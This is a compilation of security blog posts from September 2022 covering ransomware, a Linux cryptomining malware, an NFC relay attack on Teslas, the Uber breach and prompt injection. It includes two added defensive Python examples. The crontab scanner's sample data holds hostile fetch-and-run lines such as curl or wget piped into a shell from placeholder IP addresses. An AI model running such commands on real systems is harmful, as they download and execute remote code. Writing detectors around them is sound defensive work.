<h2>The LockBit Ransomware Gang Is Surprisingly Professional</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/the-lockbit-ransomware-gang-is-surprisingly-professional.html"><strong>[2022.09.07]</strong></a> This <a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/">article</a> makes LockBit sound like a legitimate organization: <blockquote>The DDoS attack last weekend that put a temporary stop to leaking Entrust data was seen as an opportunity to explore the triple extortion tactic to apply more pressure on victims to pay a ransom. LockBitSupp said that the ransomware operator is now looking to add DDoS as an extortion tactic on top of encrypting data and leaking it. “I am looking for dudosers [DDoSers] in the team, most likely now we will attack targets and provide triple extortion, encryption + date leak + dudos, because I have felt the power of dudos and how it invigorates and makes life more interesting,” LockBitSupp wrote in a post on a hacker forum. The gang also promised to share over torrent 300GB of data stolen from Entrust so “the whole world will know your secrets.” LockBit’s spokesperson said that they would share the Entrust data leak privately with anyone that contacts them before making it available over torrent.</blockquote> They’re expanding: locking people out of their data, publishing it if the victim doesn’t pay, and DDoSing their network as an additional incentive.

<h2>Facebook Has No Idea What Data It Has</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/facebook-has-no-idea-what-data-it-has.html"><strong>[2022.09.08]</strong></a> This is from a <a href="https://theintercept.com/2022/09/07/facebook-personal-data-no-accountability/">court deposition</a>: <blockquote>Facebook’s stonewalling has been revealing on its own, providing variations on the same theme: It has amassed so much data on so many billions of people and organized it so confusingly that full transparency is impossible on a technical level. In the March 2022 hearing, Zarashaw and Steven Elia, a software engineering manager, described Facebook as a data-processing apparatus so complex that it defies understanding from within. The hearing amounted to two high-ranking engineers at one of the most powerful and resource-flush engineering outfits in history describing their product as an unknowable machine. The special master at times seemed in disbelief, as when he questioned the engineers over whether any documentation existed for a particular Facebook subsystem. “Someone must have a diagram that says this is where this data is stored,” he said, according to the transcript. Zarashaw responded: “We have a somewhat strange engineering culture compared to most where we don’t generate a lot of artifacts during the engineering process. Effectively the code is its own design document often.” He quickly added, “For what it’s worth, this is terrifying to me when I first joined as well.” […] Facebook’s inability to comprehend its own functioning took the hearing up to the edge of the metaphysical. At one point, the court-appointed special master noted that the “Download Your Information” file provided to the suit’s plaintiffs must not have included everything the company had stored on those individuals because it appears to have no idea what it truly stores on anyone. Can it be that Facebook’s designated tool for comprehensively downloading your information might not actually download all your information? 
This, again, is outside the boundaries of knowledge. “The solution to this is unfortunately exactly the work that was done to create the DYI file itself,” noted Zarashaw. “And the thing I struggle with here is in order to find gaps in what may not be in DYI file, you would by definition need to do even more work than was done to generate the DYI files in the first place.” The systemic fogginess of Facebook’s data storage made answering even the most basic question futile. At another point, the special master asked how one could find out which systems actually contain user data that was created through machine inference. “I don’t know,” answered Zarashaw. “It’s a rather difficult conundrum.”</blockquote> I’m not surprised. These systems are so complex that no humans understand them anymore. That allows us to do things we couldn’t do otherwise, but it’s also a problem. EDITED TO ADD: Another <a href="https://www.vice.com/en/article/qjk3wb/facebook-engineers-admit-they-dont-know-what-they-do-with-your-data">article</a>.

<h2>Responsible Disclosure for Cryptocurrency Security</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/responsible-disclosure-for-cryptocurrency-security.html"><strong>[2022.09.09]</strong></a> Stewart Baker <a href="https://www.lawfareblog.com/rethinking-responsible-disclosure-cryptocurrency-security">discusses</a> why the industry-norm responsible disclosure for software vulnerabilities fails for cryptocurrency software. <blockquote>Why can’t the cryptocurrency industry solve the problem the way the software and hardware industries do, by patching and updating security as flaws are found? Two reasons: First, many customers don’t have an ongoing relationship with the hardware and software providers that protect their funds—nor do they have an incentive to update security on a regular basis. Turning to a new security provider or using updated software creates risks; leaving everything the way it was feels safer. So users won’t be rushing to pay for and install new security patches. Second, cryptocurrency is famously and deliberately decentralized, anonymized, and low friction. That means that the company responsible for hardware or software security may have no way to identify who used its product, or to get the patch to those users. It also means that many wallets with security flaws will be publicly accessible, protected only by an elaborate password. Once word of the flaw leaks, the password can be reverse engineered by anyone, and the legitimate owners are likely to find themselves in a race to move their assets before the thieves do. Even in the software industry, hackers routinely reverse engineer Microsoft’s patches to find the security flaws they fix and then try to exploit them before the patches have been fully installed.</blockquote> He doesn’t have any good ideas to fix this. I don’t either. Just add it to the pile of blockchain’s <a href="https://www.schneier.com/blog/archives/2019/02/blockchain_and_.html">many problems</a>.

<h2>New Linux Cryptomining Malware</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/new-linux-cryptomining-malware.html"><strong>[2022.09.12]</strong></a> It’s <a href="https://www.theregister.com/2022/09/10/in_brief_security/">pretty nasty</a>: <blockquote>The malware was dubbed “<a href="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux">Shikitega</a>” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes. Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system. […] The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available. Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said. Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.</blockquote> Another <a href="https://arstechnica.com/information-technology/2022/09/new-linux-malware-combines-unusual-stealth-with-a-full-suite-of-capabilities/">article</a>. 
Slashdot <a href="https://it.slashdot.org/story/22/09/11/0314234/powerful-new-linux-malware-shikitega-uses-unusual-multi-stage-stealth">thread</a>.
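The quoted analysis says Shikitega persists through a pair of cron jobs for the current user and a pair for root, and that it fetches payload pieces by bare IP address rather than domain name so that indicator lists go stale quickly. The following is an added example, not code from AT&T, The Register or the malware write-up: a small Python checker that parses crontab-format lines and flags entries with those traits. The crontab lines are constructed samples using TEST-NET addresses, not real indicators, and the three heuristics (a download tool aimed at an IP literal, output piped into a shell, execution from a world-writable temp directory) are generic and will need tuning for a given fleet.

```python
import re

# Constructed sample crontab entries (not real indicators), keyed by the user
# whose `crontab -l` output they represent.
SAMPLE_CRONTABS = {
    "alice": [
        "0 2 * * * /usr/local/bin/backup.sh",
        "*/5 * * * * curl -s http://203.0.113.7/p.sh | sh",   # constructed
    ],
    "root": [
        "15 3 * * * /usr/bin/apt-get update",
        "@reboot /tmp/.x/run.sh",                             # constructed
        "* * * * * wget -qO- 198.51.100.9:8080/a | bash",    # constructed
    ],
}

# Either an @shortcut (@reboot, @daily, ...) or five schedule fields, then the command.
CRON_ENTRY = re.compile(r"^(?:@\w+|(?:\S+\s+){5})\s*(?P<cmd>.+)$")
IPV4_LITERAL = re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])")
DOWNLOAD_TOOL = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da)?sh\b")
TEMP_PATH = re.compile(r"(^|\s)/(?:tmp|dev/shm|var/tmp)/")


def analyze_entry(line: str) -> list[str]:
    """Return the reasons a crontab entry looks suspicious (empty list if none)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    m = CRON_ENTRY.match(line)
    if not m:
        return ["unparseable entry"]
    cmd = m.group("cmd")
    reasons = []
    # Payload staging by IP literal, the trait the analysis calls hard to blocklist.
    if DOWNLOAD_TOOL.search(cmd) and IPV4_LITERAL.search(cmd):
        reasons.append("downloads from a bare IP address")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes downloaded content into a shell")
    if TEMP_PATH.search(cmd):
        reasons.append("executes from a world-writable temp directory")
    return reasons


def scan_crontabs(crontabs: dict[str, list[str]]) -> list[tuple[str, str, list[str]]]:
    """Run analyze_entry over every user's crontab and collect the hits."""
    findings = []
    for user, lines in crontabs.items():
        for line in lines:
            reasons = analyze_entry(line)
            if reasons:
                findings.append((user, line, reasons))
    return findings


if __name__ == "__main__":
    for user, line, reasons in scan_crontabs(SAMPLE_CRONTABS):
        print(f"[{user}] {line}\n    -> {'; '.join(reasons)}")
```

On a real host the input would come from `crontab -l -u <user>` for each account plus the files under `/etc/cron.d`; the point of the heuristics is that they key on behaviour (where the command fetches from and what it does with the result) rather than on addresses that, as the analysis notes, are reused for legitimate traffic within days.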

<h2>FBI Seizes Stolen Cryptocurrencies</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/fbi-seizes-stolen-cryptocurrencies.html"><strong>[2022.09.13]</strong></a> The <i>Wall Street Journal</i> is <a href="https://www.wsj.com/articles/u-s-recovers-over-30-million-in-cryptocurrency-stolen-by-north-korean-hackers-11662648600">reporting</a> that the FBI has recovered over $30 million in cryptocurrency stolen by North Korean hackers earlier this year. It’s only a fraction of the $540 million stolen, but it’s something. <blockquote>The Axie Infinity recovery represents a shift in law enforcement’s ability to trace funds through a web of so-called crypto addresses, the virtual accounts where cryptocurrencies are stored. These addresses can be created quickly without them being linked to a cryptocurrency company that could freeze the funds. In its effort to mask the stolen crypto, Lazarus Group used more than 12,000 different addresses, according to Chainalysis. Unlike bank transactions that happen through private networks, movement between crypto accounts is visible to the world on the blockchain. Advanced blockchain-monitoring tools and cooperation from centralized crypto exchanges enabled the FBI to trace the crypto to where Lazarus Group tried to cash out, investigators said.</blockquote> The money was laundered through the Tornado Cash mixer.

<h2>Weird Fallout from Peiter Zatko's Twitter Whistleblowing</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/weird-fallout-from-peiter-zatkos-twitter-whistleblowing.html"><strong>[2022.09.14]</strong></a> People are trying to <a href="https://www.newyorker.com/news/news-desk/the-search-for-dirt-on-the-twitter-whistle-blower">dig up dirt</a> on Peiter Zatko, better known as Mudge. For the record, I have not been contacted. I’m not sure if I should feel slighted.

<h2>Upcoming Speaking Engagements</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/upcoming-speaking-engagements-23.html"><strong>[2022.09.14]</strong></a> This is a current list of where and when I am scheduled to speak: <ul> <li>I’m speaking as part of a Geneva Centre for Security Policy course on <a href="https://www.gcsp.ch/courses/cyber-security-context-international-security">Cyber Security in the Context of International Security</a>, online, on September 22, 2022.</li> <li>I’m speaking at <a href="https://www.avantec.ch/inside/">IT-Security INSIDE 2022</a> in Zurich, Switzerland, on September 22, 2022.</li> </ul> The list is maintained on <a href="https://www.schneier.com/events/">this page</a>.

<h2>Relay Attack against Teslas</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/relay-attack-against-teslas.html"><strong>[2022.09.15]</strong></a> Nice <a href="https://jalopnik.com/teslas-hackers-have-found-another-unauthorized-access-v-1849535920">work</a>: <blockquote>Radio relay attacks are technically complicated to execute, but conceptually easy to understand: attackers simply extend the range of your existing key using what is essentially a high-tech walkie-talkie. One thief stands near you while you’re in the grocery store, intercepting your key’s transmitted signal with a radio transceiver. Another stands near your car, with another transceiver, taking the signal from their friend and passing it on to the car. Since the car and the key can now talk, through the thieves’ range extenders, the car has no reason to suspect the key isn’t inside—and fires right up. But Tesla’s credit card keys, like <a href="https://www.nfcw.com/nfc-world/nfc-digital-car-keys-go-live-for-android-users/">many digital keys stored in cell phones</a>, don’t work via radio. Instead, they rely on a different protocol called Near Field Communication or NFC. Those keys had previously been seen as more secure, since <a href="https://www.mouser.com/applications/rfid-nfc-introduction/">their range is so limited</a> and their handshakes with cars are more complex. Now, researchers <a href="https://act-on.ioactive.com/acton/attachment/34793/f-6460b49e-1afe-41c3-8f73-17dc14916847/1/-/-/-/-/NFC-relay-TESlA_JRoriguez.pdf">seem to have cracked the code</a>. By reverse-engineering the communications between a Tesla Model Y and its credit card key, they were able to properly execute a range-extending relay attack against the crossover. While this specific use case focuses on Tesla, it’s a proof of concept—NFC handshakes can, and eventually will, be reverse-engineered.</blockquote>
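The quoted explanation is the essence of a relay: the two transceivers forward the handshake unchanged, so the car's cryptography alone cannot tell a key next to it from a key across the parking lot. The following added example (not code from the researchers, Tesla or the article) shows the check that does tell them apart, a round-trip time bound on a challenge/response, using a toy HMAC-based protocol and a simulated clock. The protocol, the shared key and the millisecond figures are assumptions for illustration, not Tesla's NFC implementation.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Constructed shared secret for the toy protocol; a real key is provisioned
# per car/key pair and never appears in source.
SHARED_KEY = b"toy-demo-key-not-a-real-secret"

# Assumed upper bound the car enforces on the round trip. The figure is
# illustrative: a direct NFC exchange is short, a two-radio relay adds delay.
RTT_LIMIT_MS = 20.0


@dataclass
class Fob:
    key: bytes

    def respond(self, challenge: bytes) -> bytes:
        # The key proves possession of the secret by MACing the car's fresh nonce.
        return hmac.new(self.key, challenge, hashlib.sha256).digest()


@dataclass
class Car:
    key: bytes
    rtt_limit_ms: float = RTT_LIMIT_MS

    def authenticate(self, channel) -> tuple[bool, str]:
        challenge = secrets.token_bytes(16)
        # channel(challenge) returns (response, elapsed_ms) as measured by the car.
        response, elapsed_ms = channel(challenge)
        expected = hmac.new(self.key, challenge, hashlib.sha256).digest()
        if not hmac.compare_digest(response, expected):
            return False, "bad response"
        if elapsed_ms > self.rtt_limit_ms:
            return False, f"round trip {elapsed_ms:.1f} ms exceeds {self.rtt_limit_ms} ms"
        return True, "ok"


def direct_channel(fob: Fob, hop_ms: float = 2.0):
    """Key physically next to the car: one short hop each way (simulated clock)."""
    def channel(challenge: bytes):
        return fob.respond(challenge), 2 * hop_ms
    return channel


def relayed_channel(fob: Fob, hop_ms: float = 2.0, relay_ms: float = 35.0):
    """Two transceivers forwarding the exchange over a longer link. The
    cryptography is untouched, so only timing reveals the relay."""
    def channel(challenge: bytes):
        # car -> relay A -> link -> relay B -> fob, and the same path back
        return fob.respond(challenge), 2 * hop_ms + 2 * relay_ms
    return channel


def run_scenarios() -> dict[str, bool]:
    """Outcome of each scenario: True means the car would unlock."""
    fob = Fob(SHARED_KEY)
    car = Car(SHARED_KEY)
    # A car with no timing bound has only the MAC to go on.
    car_no_bound = Car(SHARED_KEY, rtt_limit_ms=float("inf"))
    return {
        "direct": car.authenticate(direct_channel(fob))[0],
        "relayed": car.authenticate(relayed_channel(fob))[0],
        "relayed_no_bound": car_no_bound.authenticate(relayed_channel(fob))[0],
        "wrong_key": car.authenticate(direct_channel(Fob(b"other")))[0],
    }


if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name:17s} -> {'unlock' if ok else 'reject'}")
```

The `relayed_no_bound` scenario is the situation the article describes: with a valid key on the far end, the MAC verifies and the car has no reason to refuse. The bound only helps if it is tight enough that a relay's added latency cannot hide inside it, which is why real distance-bounding designs measure at the radio layer rather than in application code.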

<h2>Massive Data Breach at Uber</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/massive-data-breach-at-uber.html"><strong>[2022.09.16]</strong></a> It’s <a href="https://www.nytimes.com/2022/09/15/technology/uber-hacking-breach.html">big</a>: <blockquote>The breach appeared to have compromised many of Uber’s internal systems, and a person claiming responsibility for the hack sent images of email, cloud storage and code repositories to cybersecurity researchers and The New York Times. “They pretty much have full access to Uber,” said Sam Curry, a security engineer at Yuga Labs who corresponded with the person who claimed to be responsible for the breach. “This is a total compromise, from what it looks like.”</blockquote> It looks like a pretty basic phishing attack; someone gave the hacker their login credentials. And because Uber has lousy internal security, lots of people have access to everything. So once a hacker gains a foothold, they have access to everything. This is the same thing that Mudge <a href="https://www.hawley.senate.gov/twitter-whistleblower-engineers-have-access-personal-user-data-can-tweet-anybody">accuses Twitter of</a>: too many employees have broad access within the company’s network. More <a href="https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/">details</a>. Slashdot <a href="https://it.slashdot.org/story/22/09/16/090235/uber-investigating-breach-of-its-computer-systems">thread</a>. EDITED TO ADD (9/20): More <a href="https://www.darkreading.com/attacks-breaches/uber-breach-external-contractor-mfa-bombing-attack">details</a>.

<h2>Large-Scale Collection of Cell Phone Data at US Borders</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/large-scale-collection-of-cell-phone-data-at-us-borders.html"><strong>[2022.09.19]</strong></a> The <i>Washington Post</i> is <a href="https://www.washingtonpost.com/technology/2022/09/15/government-surveillance-database-dhs/">reporting</a> that the US Customs and Border Protection agency is seizing and copying cell phone, tablet, and computer data from “as many as” 10,000 phones per year, including an unspecified number of American citizens. This is done without a warrant, because “…courts have long granted an exception to border authorities, allowing them to search people’s devices without a warrant or suspicion of a crime.” <blockquote>CBP’s inspection of people’s phones, laptops, tablets and other electronic devices as they enter the country has long been a controversial practice that the agency has defended as a low-impact way to pursue possible security threats and determine an individual’s “intentions upon entry” into the U.S. But the revelation that thousands of agents have access to a searchable database without public oversight is a new development in what privacy advocates and some lawmakers warn could be an infringement of Americans’ Fourth Amendment rights against unreasonable searches and seizures. […] CBP conducted roughly 37,000 searches of travelers’ devices in the 12 months ending in October 2021, according to <a href="https://www.cbp.gov/newsroom/stats/cbp-enforcement-statistics">agency data</a>, and more than 179 million people traveled that year through U.S. ports of entry. </blockquote> <a href="https://gizmodo.com/border-patrol-surveillance-cell-data-no-warrants-1849540504">More</a> <a href="https://politicalwire.com/2022/09/15/customs-officials-have-copied-americans-phone-data/">articles</a>. Slashdot <a href="https://yro.slashdot.org/story/22/09/15/2018208/customs-officials-have-copied-americans-phone-data-at-massive-scale">thread</a>.

<h2>Credit Card Fraud That Bypasses 2FA</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/credit-card-fraud-that-bypasses-2fa.html"><strong>[2022.09.20]</strong></a> Someone in the UK is stealing <a href="https://www.bbc.com/news/uk-england-london-62809151">smartphones and credit cards</a> from people who have stored them in gym lockers, and is using the two items in combination to commit fraud: <blockquote>Phones, of course, can be made inaccessible with the use of passwords and face or fingerprint unlocking. And bank cards can be stopped. But the thief has a method which circumnavigates those basic safety protocols. Once they have the phone and the card, they register the card on the relevant bank’s app on their own phone or computer. Since it is the first time that card will have been used on the new device, a one-off security passcode is demanded. That verification passcode is sent by the bank to the stolen phone. The code flashes up on the locked screen of the stolen phone, leaving the thief to tap it into their own device. Once accepted, they have control of the bank account. They can transfer money or buy goods, or change access to the account.</blockquote>

<h2>Automatic Cheating Detection in Human Racing</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/automatic-cheating-detection-in-human-racing.html"><strong>[2022.09.21]</strong></a> This is a <a href="https://joeposnanski.substack.com/p/checkmate">fascinating glimpse</a> of the future of automatic cheating detection in sports: <blockquote>Maybe you heard about the truly insane false-start controversy in track and field? Devon Allen—a wide receiver for the Philadelphia Eagles—was disqualified from the 110-meter hurdles at the World Athletics Championships a few weeks ago for a false start. Here’s the problem: You can’t see the false start. Nobody can see the false start. By sight, Allen most definitely does not leave before the gun. But here’s the thing: World Athletics has determined that it is not possible for someone to push off the block within a tenth of a second of the gun without false starting. They have science that shows it is beyond human capabilities to react that fast. Of course there are those (I’m among them) who would tell you that’s nonsense, that’s pseudoscience, there’s no way that they can limit human capabilities like that. There is science that shows it is humanly impossible to hit a fastball. There was once science that showed human beings could not run a four-minute mile. Besides, do you know what Devon Allen’s reaction time was? It was 0.99 seconds. One thousandth of a second too fast, according to World Athletics’ science. They’re THAT sure that .01 seconds—and EXACTLY .01 seconds—is the limit of human possibilities that they will disqualify an athlete who has trained his whole life for this moment because he reacted one thousandth of a second faster than they think possible?</blockquote> We in the computer world are used to this sort of thing. “The computer is always right,” even when it’s obviously wrong. But now computers are leaving the world of keyboards and screens, and this sort of thing will become more pervasive. 
In sports, computer systems are used to detect when a ball is out of bounds in tennis and other games and when a pitch is a strike in baseball. I’m sure there’s more—are computers detecting first downs in football?—but I’m not enough of a sports person to know them.

<h2>Prompt Injection/Extraction Attacks against AI Systems</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/prompt-injection-extraction-attacks-against-ai-systems.html"><strong>[2022.09.22]</strong></a> This is <a href="https://simonwillison.net/2022/Sep/12/prompt-injection/">an</a> <a href="https://simonwillison.net/2022/Sep/16/prompt-injection-solutions/">interesting</a> <a href="https://simonwillison.net/2022/Sep/17/prompt-injection-more-ai/">attack</a> I had not previously considered. The variants <a href="https://mobile.twitter.com/mkualquiera/status/1570546998104948736">are</a> <a href="https://mobile.twitter.com/mkualquiera/status/1570840288188592129">interesting</a>, and I think we’re just starting to understand their implications.

<h2>Leaking Screen Information on Zoom Calls through Reflections in Eyeglasses</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/leaking-screen-information-on-zoom-calls-through-reflections-in-eyeglasses.html"><strong>[2022.09.23]</strong></a> Okay, it’s an obscure threat. But people are <a href="https://www.theregister.com/2022/09/17/glasses_reflections_zoom/">researching it</a>: <blockquote>“Our models and experimental results in a controlled lab setting show it is possible to reconstruct and recognize with over 75 percent accuracy on-screen texts that have heights as small as 10 mm with a 720p webcam.” That corresponds to 28 pt, a font size commonly used for headings and small headlines. […] Being able to read reflected headline-size text isn’t quite the privacy and security problem of being able to read smaller 9 to 12 pt fonts. But this technique is expected to provide access to smaller font sizes as high-resolution webcams become more common. “We found future 4k cameras will be able to peek at most header texts on almost all websites and some text documents,” said Long. […] A variety of factors can affect the legibility of text reflected in a video conference participant’s glasses. These include reflectance based on the meeting participant’s skin color, environmental light intensity, screen brightness, the contrast of the text with the webpage or application background, and the characteristics of eyeglass lenses. Consequently, not every glasses-wearing person will necessarily provide adversaries with reflected screen sharing. With regard to potential mitigations, the boffins say that Zoom already provides a video filter in its Background and Effects settings menu that consists of reflection-blocking opaque cartoon glasses. Skype and Google Meet lack that defense.</blockquote> Research <a href="https://arxiv.org/abs/2205.03971">paper</a>.

<h2>Leaking Passwords through the Spellchecker</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/leaking-passwords-through-the-spellchecker.html"><strong>[2022.09.26]</strong></a> Sometimes browser spellcheckers <a href="https://www.bleepingcomputer.com/news/security/google-microsoft-can-get-your-passwords-via-web-browsers-spellcheck/">leak passwords</a>: <blockquote>When using major web browsers like Chrome and Edge, your form data is transmitted to Google and Microsoft, respectively, should enhanced spellcheck features be enabled. Depending on the website you visit, the form data may itself include PII—including but not limited to Social Security Numbers (SSNs)/Social Insurance Numbers (SINs), name, address, email, date of birth (DOB), contact information, bank and payment information, and so on.</blockquote> The solution is to only use the spellchecker options that keep the data on your computer—and don’t send it into the cloud.

<h2>New Report on IoT Security</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/new-report-on-iot-security.html"><strong>[2022.09.27]</strong></a> The Atlantic Council has published a <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/security-in-the-billions/">report</a> on securing the Internet of Things: “Security in the Billions: Toward a Multinational Strategy to Better Secure the IoT Ecosystem.” The report examines the regulatory approaches taken by four countries—the US, the UK, Australia, and Singapore—to secure home, medical, and networking/telecommunications devices. The report recommends that regulators should 1) enforce minimum security standards for manufacturers of IoT devices, 2) incentivize higher levels of security through public contracting, and 3) try to align IoT standards internationally (for example, international guidance on handling connected devices that stop receiving security updates). <blockquote>This report looks to existing security initiatives as much as possible—both to leverage existing work and to avoid counterproductively suggesting an entirely new approach to IoT security—while recommending changes and introducing more cohesion and coordination to regulatory approaches to IoT cybersecurity. It walks through the current state of risk in the ecosystem, analyzes challenges with the current policy model, and describes a synthesized IoT security framework. The report then lays out nine recommendations for government and industry actors to enhance IoT security, broken into three recommendation sets: setting a baseline of minimally acceptable security (or “Tier 1”), incentivizing above the baseline (or “Tier 2” and above), and pursuing international alignment on standards and implementation across the entire IoT product lifecycle (from design to sunsetting). 
It also includes implementation guidance for the United States, Australia, UK, and Singapore, providing a clearer roadmap for countries to operationalize the recommendations in their specific jurisdictions—and push towards a stronger, more cohesive multinational approach to securing the IoT worldwide.</blockquote> Note: One of the authors of this report was a student of mine at Harvard Kennedy School, and did this work with the Atlantic Council under my supervision.

<h2>Cold War Bugging of Soviet Facilities</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/cold-war-bugging-of-soviet-facilities.html"><strong>[2022.09.28]</strong></a> Found documents in Poland <a href="https://thebrushpass.projectbrazen.com/coldwarbuggingsovietunion/">detail</a> US spying operations against the former Soviet Union. <blockquote>The file details a number of bugs found at Soviet diplomatic facilities in Washington, D.C., New York, and San Francisco, as well as in a Russian government-owned vacation compound, apartments used by Russia personnel, and even Russian diplomats’ cars. And the bugs were <i>everywhere</i>: encased in plaster in an apartment closet; behind electrical and television outlets; bored into concrete bricks and threaded into window frames; inside wooden beams and baseboards and stashed within a building’s foundation itself; surreptitiously attached to security cameras; wired into ceiling panels and walls; and secretly implanted into the backseat of cars and in their window panels, instrument panels, and dashboards. It’s an impressive—and impressively thorough—effort by U.S. counterspies.</blockquote> We have long read about sophisticated Russian spying operations—bugging the <a href="https://irp.fas.org/news/2001/03/moscowbugs.html">Moscow embassy</a>, bugging <a href="https://www.cryptomuseum.com/covert/bugs/selectric/">Selectric typewriters</a> in the Moscow embassy, bugging the <a href="https://www.airforcemag.com/PDF/MagazineArchive/Documents/2012/September%202012/0912embassy.pdf">new Moscow embassy</a>. These are the first details I’ve read about the US bugging the Russians’ embassy.

<h2>Differences in App Security/Privacy Based on Country</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/differences-in-app-security-privacy-based-on-country.html"><strong>[2022.09.29]</strong></a> Depending on where you are when you download your Android apps, it might collect <a href="https://theconversation.com/the-same-app-can-pose-a-bigger-security-and-privacy-threat-depending-on-the-country-where-you-download-it-study-finds-189099">more or less data</a> about you. <blockquote>The apps we downloaded from Google Play also showed differences based on country in their security and privacy capabilities. One hundred twenty-seven apps varied in what the apps were allowed to access on users’ mobile phones, 49 of which had additional permissions deemed “dangerous” by Google. Apps in Bahrain, Tunisia and Canada requested the most additional dangerous permissions. Three VPN apps enable clear text communication in some countries, which allows unauthorized access to users’ communications. One hundred and eighteen apps varied in the number of ad trackers included in an app in some countries, with the categories Games, Entertainment and Social, with Iran and Ukraine having the most increases in the number of ad trackers compared to the baseline number common to all countries. One hundred and three apps have differences based on country in their privacy policies. Users in countries not covered by data protection regulations, such as GDPR in the EU and the California Consumer Privacy Act in the U.S., are at higher privacy risk. For instance, 71 apps available from Google Play have clauses to comply with GDPR only in the EU and CCPA only in the U.S. 
Twenty-eight apps that use dangerous permissions make no mention of it, despite <a href="https://support.google.com/googleplay/android-developer/answer/10144311?visit_id=637995492293465522-1318183419&rd=1">Google’s policy</a> requiring them to do so.</blockquote> Research paper: “<a href="https://www.usenix.org/conference/usenixsecurity22/presentation/kumar">A Large-scale Investigation into Geodifferences in Mobile Apps</a>”: <blockquote><b>Abstract</b>: Recent studies on the web ecosystem have been raising alarms on the increasing geodifferences in access to Internet content and services due to Internet censorship and geoblocking. However, geodifferences in the mobile app ecosystem have received limited attention, even though apps are central to how mobile users communicate and consume Internet content. We present the first large-scale measurement study of geodifferences in the mobile app ecosystem. We design a semi-automatic, parallel measurement testbed that we use to collect 5,684 popular apps from Google Play in 26 countries. In all, we collected 117,233 apk files and 112,607 privacy policies for those apps. Our results show high amounts of geoblocking with 3,672 apps geoblocked in at least one of our countries. While our data corroborates anecdotal evidence of takedowns due to government requests, unlike common perception, we find that blocking by developers is significantly higher than takedowns in all our countries, and has the most influence on geoblocking in the mobile app ecosystem. We also find instances of developers releasing different app versions to different countries, some with weaker security settings or privacy disclosures that expose users to higher security and privacy risks. We provide recommendations for app market proprietors to address the issues discovered.</blockquote>

<h2>Security Vulnerabilities in Covert CIA Websites</h2>

<a href="https://www.schneier.com/blog/archives/2022/09/security-vulnerabilities-in-covert-cia-websites.html"><strong>[2022.09.30]</strong></a> Back in 2018, we learned that the covert system of websites that the CIA used for communications was <a href="https://news.yahoo.com/cias-communications-suffered-catastrophic-compromise-started-iran-090018710.html/">compromised by</a>—at least—China and Iran, and that the blunder caused a bunch of arrests, imprisonments, and executions. We’re <a href="https://www.reuters.com/investigates/special-report/usa-spies-iran/">now learning</a> that the CIA is still “using an irresponsibly secured system for asset communication.” Citizen Lab did the <a href="https://citizenlab.ca/2022/09/statement-on-the-fatal-flaws-found-in-a-defunct-cia-covert-communications-system/">research</a>: <blockquote>Using only a single website, as well as publicly available material such as historical internet scanning results and the Internet Archive’s Wayback Machine, we identified a network of 885 websites and have high confidence that the United States (US) Central Intelligence Agency (CIA) used these sites for covert communication. The websites included similar Java, JavaScript, Adobe Flash, and CGI artifacts that implemented or apparently loaded covert communications apps. In addition, blocks of sequential IP addresses registered to apparently fictitious US companies were used to host some of the websites. All of these flaws would have facilitated discovery by hostile parties. […] The bulk of the websites that we discovered were active at various periods between 2004 and 2013. We do not believe that the CIA has recently used this communications infrastructure. 
Nevertheless, a subset of the websites are linked to individuals who may be former and possibly still active intelligence community employees or assets: <ul><li>Several are currently abroad</li> <li>Another left mainland China in the timeframe of the Chinese crackdown</li> <li>Another was subsequently employed by the US State Department</li> <li>Another now works at a foreign intelligence contractor</li></ul></blockquote> Citizen Lab is not publishing details, of course. When I was a kid, I thought a lot about being a spy. And this, right here, was the one thing I worried about. It didn’t matter how clever and resourceful I was. If my handlers were incompetent, I was dead. Another <a href="https://www.theguardian.com/us-news/2022/sep/29/cia-websites-security-sources-communication-safety">news article</a>. EDITED TO ADD (10/2): Slashdot <a href="https://it.slashdot.org/story/22/10/01/204219/covert-cia-websites-could-have-been-found-by-an-amateur-research-finds">thread</a>.

<h2>Detecting Deepfake Audio by Modeling the Human Acoustic Tract</h2>

